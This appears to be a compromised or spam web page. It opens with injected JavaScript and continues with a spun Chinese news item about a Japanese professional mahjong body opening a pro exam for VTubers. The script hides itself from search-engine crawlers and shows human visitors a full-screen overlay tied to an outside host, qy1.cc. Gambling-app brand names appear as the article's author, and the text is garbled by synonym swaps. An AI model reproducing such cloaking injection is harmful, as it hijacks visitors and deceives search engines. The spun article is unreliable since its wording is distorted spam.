var reg = /(Baiduspider|360Spider|YisouSpider|YandexBot|Sogou inst spider|Sogou web spider|spider)/i; if (!reg.test(navigator.userAgent)) { let flag = navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i); if (flag) { //k _src = 'https://qy1.cc/' } else { // PC _src = 'https://qy1.cc/' } document.write(''); var hd = document.head; var styleCSS = document.createElement('style'), yabo = document.createElement('div'); styleCSS.innerHTML = 'html,body{position:relative;width:auto !important;height:100% !important;min-width:auto !important;overflow:hidden;}.yabo{position:fixed;top:0;left:0;right:0;height:100%;z-index:9999999999;background:#fff;}'; yabo.setAttribute('class', 'yabo'); yabo.innerHTML = ''; hd.appendChild(styleCSS); hd.parentNode.appendChild(yabo); }

营业时间

周一至周五,8:00 - 9:00

致电我们

+15906190858(徐总)

给我们发电子邮件

zjyj@cscec.com

日本职业麻将协会为VTuber开设职业测验

Author:leyu乐鱼全站App下载|爱游戏全站app下载 In:2022-04-25 日本职业麻将协会为VTuber开设职业测验

日本职业麻将协会公布了将于2023年2月,开设面向VTuber的职业测验。到场测验的VTuber需要满意在YouTube上有1000名以上的粉丝,而且开通了收益化的前提 。别的要求报名者在作为VTuber勾当的时辰 ,没有使用变声器。

日本职业麻将协会的职业测验一般包孕笔试、口试以及实技测试。此次面向VTuber的测验重要举行笔试以及口试 。此中笔试内容包孕麻将问题 、一般知识问题以及阐述题。

leyu乐鱼全站App下载|爱游戏全站app下载
【读音】:

rì běn zhí yè má jiāng xié huì gōng bù le jiāng yú 2023nián 2yuè ,kāi shè miàn xiàng VTuberde zhí yè cè yàn 。dào chǎng cè yàn de VTuberxū yào mǎn yì zài YouTubeshàng yǒu 1000míng yǐ shàng de fěn sī ,ér qiě kāi tōng le shōu yì huà de qián tí 。bié de yào qiú bào míng zhě zài zuò wéi VTubergōu dāng de shí chén ,méi yǒu shǐ yòng biàn shēng qì 。

rì běn zhí yè má jiāng xié huì de zhí yè cè yàn yī bān bāo yùn bǐ shì 、kǒu shì yǐ jí shí jì cè shì 。cǐ cì miàn xiàng VTuberde cè yàn zhòng yào jǔ háng bǐ shì yǐ jí kǒu shì 。cǐ zhōng bǐ shì nèi róng bāo yùn má jiāng wèn tí 、yī bān zhī shí wèn tí yǐ jí chǎn shù tí 。

发表评论